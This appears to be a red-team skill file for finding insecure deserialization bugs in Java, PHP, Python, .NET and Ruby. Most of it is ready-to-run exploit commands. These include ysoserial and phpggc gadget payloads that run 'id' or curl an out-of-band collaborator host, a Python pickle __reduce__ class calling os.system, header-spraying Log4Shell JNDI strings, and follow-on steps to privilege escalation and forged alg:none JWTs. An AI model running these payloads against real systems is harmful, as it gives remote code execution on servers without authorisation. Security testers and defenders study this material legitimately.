| name | hunt-deserialization |
| description | Hunt Insecure Deserialization — Java gadget chains (ysoserial), PHP object injection (phpggc), Python pickle RCE, .NET BinaryFormatter, Ruby Marshal.load, JNDI/Log4Shell. RCE via deserialization is almost always Critical. Use when target runs Java, PHP serialization, Python pickle, .NET, or Ruby on Rails. |
| version | 1.1.0 |
| revision_date | "2026-07-25T00:00:00.000Z" |
| license | MIT |
| category | redteam |
| tags | ["deserialization","hunt","redteam"] |
HUNT-DESERIALIZATION — Insecure Deserialization
Crown Jewel Targets
Deserialization bugs are almost always Critical — they lead directly to RCE without prerequisite conditions.
Highest-value chains:
- Java ysoserial gadget chains — CommonsCollections, Spring, JNDI, Groovy gadgets → full OS command execution
- PHP Object Injection —
__wakeup / __destruct magic methods → file write / RCE
- Python pickle —
pickle.loads(attacker_data) → __reduce__ → os.system('id')
- .NET BinaryFormatter — TypeConfuseDelegate gadget chain → RCE
- Ruby Marshal.load — Gem::Requirement, Gem::Installer gadgets → RCE
- JNDI injection — Log4Shell pattern:
${jndi:ldap://attacker/a} → class load → RCE
Attack Surface Signals
Detection Patterns
echo "rO0ABXQ=" | base64 -d | xxd | head -1
curl --max-time 30 --connect-timeout 10 -sI https://$TARGET/ | grep -i "Set-Cookie.*rememberMe"
curl --max-time 30 --connect-timeout 10 -H 'User-Agent: ${jndi:dns://COLLAB_HOST/a}' https://$TARGET/
Header / Cookie Signals
Content-Type: application/x-java-serialized-object
Cookie containing rO0= prefix (Java base64 serialized)
Cookie: rememberMe= (Apache Shiro)
Cookie: _VIEWSTATE (ASP.NET ViewState without encryption)
Endpoints: /remoting/, /invoker/, /jmx-console/, /wls-wsat/
Step-by-Step Hunting Methodology
Phase 1 — Java Deserialization (ysoserial)
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
java -jar ysoserial-all.jar CommonsCollections6 \
'curl http://COLLAB_HOST/ysoserial' | base64 -w0
java -jar ysoserial-all.jar CommonsCollections6 'id > /tmp/pwned' | base64 | \
curl --max-time 30 --connect-timeout 10 -s https://$TARGET/wls-wsat/CoordinatorPortType \
-H "Content-Type: application/x-java-serialized-object" \
--data-binary @-
python3 shiro_exploit.py -u https://$TARGET/ -c "id"
Phase 2 — PHP Object Injection
grep -r "unserialize(" --include="*.php" .
git clone https://github.com/ambionics/phpggc
php phpggc -l
php phpggc Laravel/RCE5 system id | base64
Phase 3 — Python Pickle
python3 -c "
import pickle, os, base64
class Exploit(object):
def __reduce__(self):
return (os.system, ('curl http://COLLAB_HOST/pickle-rce',))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
"
curl --max-time 30 --connect-timeout 10 -s https://$TARGET/api/load-model \
-H "Content-Type: application/octet-stream" \
--data-binary @payload.pkl
Phase 4 — .NET ViewState
dotnet YSoSerial.exe -f BinaryFormatter -g TypeConfuseDelegate \
-c "cmd /c curl http://COLLAB_HOST/viewstate-rce" -o base64
Phase 5 — Log4Shell / JNDI
COLLAB="COLLAB_HOST"
for HEADER in "User-Agent" "X-Forwarded-For" "Referer" "X-Api-Version" "Accept-Language"; do
curl --max-time 30 --connect-timeout 10 -s https://$TARGET/ -H "$HEADER: \${jndi:dns://$COLLAB/$HEADER}" &
done
curl --max-time 30 --connect-timeout 10 -s -X POST https://$TARGET/api/login \
-H "Content-Type: application/json" \
-d "{\"username\": \"\${jndi:ldap://$COLLAB/a}\"}"
Phase 6 — Ruby Marshal
grep -r "Marshal.load\|Marshal.restore" --include="*.rb" .
Chain Table
| Deserialization signal | Chain to | Impact |
|---|
| Any deser RCE | /etc/passwd + id output | Prove arbitrary command execution |
| RCE as low-privilege user | Find SUID binaries / sudo rules | Privilege escalation → root |
| Blind RCE (OOB callback) | DNS callback → confirm exec | Sufficient for Critical PoC |
| Log4Shell | LDAP → JNDI → class load | Full RCE on JVM process |
Automation
interactsh-client -v -n 5
git clone https://github.com/pimps/JNDI-Exploit-Kit
Validation
✅ DNS/HTTP callback from COLLAB host: blind deserialization confirmed
✅ Command output in response: full RCE confirmed
Severity: Almost always Critical — RCE with server process privileges.
Verification
- ysoserial availability — check if ysoserial is installed:
which ysoserial 2>/dev/null || ls /opt/ysoserial*.jar 2>/dev/null | head -1 && echo "PASS: ysoserial found" || echo "NOTE: ysoserial not installed"
- PHP deserialization test — verify PHP payload generation:
php -r "echo serialize(['test'=>'value']);" 2>/dev/null && echo "PASS: PHP serialize works" || echo "NOTE: PHP not available"
All tests verify deserialization probing.
Pitfalls
- ysoserial payload without gadget chain — generating a payload is not exploitation. Need to confirm the target's classpath contains the specific gadget.
- Java deserialization vs PHP unserialize — different languages, different tools. Don't cross-apply payloads.
- Base64-encoded payload but server expects raw binary — some servers accept base64, others raw. Test both encodings.
- Content-Type mismatch — Java deserialization typically expects
application/x-java-serialized-object or application/octet-stream. Wrong Content-Type may cause silent rejection.
- WAF deserialization filtering — many WAFs block known ysoserial gadget signatures. The bug may still exist but require a custom gadget chain.
Related Skills
hunt-rce — Deserialization is the canonical server-side RCE path. Chain primitive: Java ysoserial gadget chain (CommonsCollections6) → OS command execution as the application server user → id / whoami in response or OOB callback.
hunt-aspnet — ASP.NET ViewState deserialization is a .NET-specific RCE class. Chain primitive: __VIEWSTATEENCRYPTED="" (signed-only) + leaked <machineKey> validationKey → ysoserial.net -p ViewState -g TypeConfuseDelegate → RCE as IIS worker process.
hunt-lfi — PHP phar:// deserialization chains file upload with PHP object injection. Chain primitive: upload a polyglot JPEG + PHAR file → include it via phar:///path/to/upload.jpg → __wakeup/__destruct magic methods called → RCE via PHP gadget chain.
hunt-xxe — XML external entity processing often pairs with XML deserialization sinks. Chain primitive: SOAP endpoint accepts XML → XXE exfiltrates /etc/passwd via OOB DTD → combined with Java deserialization if the XML parser uses XStream or similar.
hunt-api-misconfig — JWT alg:none or weak HMAC secret is a deserialization-equivalent — the server deserializes the token payload without verifying integrity. Chain primitive: {"alg":"none","typ":"JWT"}.{"sub":"admin","role":"admin"}. → server accepts forged JWT payload as deserialized identity.
security-arsenal — Reach for the Deserialization Payload Tree: ysoserial Java gadget chains (CommonsCollections, Spring, JNDI, Groovy, ROME), ysoserial.net (.NET BinaryFormatter, ViewState, ObjectStateFormatter), PHPGGC (Laravel, CodeIgniter, Zend), Python pickle __reduce__, Ruby Marshal Gem::Installer, and the JNDI/Log4Shell chain.
triage-validation — Apply the Pre-Severity Gate before claiming Critical. A Java serialized object header (AC ED 00 05 / rO0ABX) in a cookie does NOT confirm the application deserializes it — confirm by sending a crafted ysoserial payload with an OOB callback. Deserialization found = Critical, but deserialization confirmed = the higher value.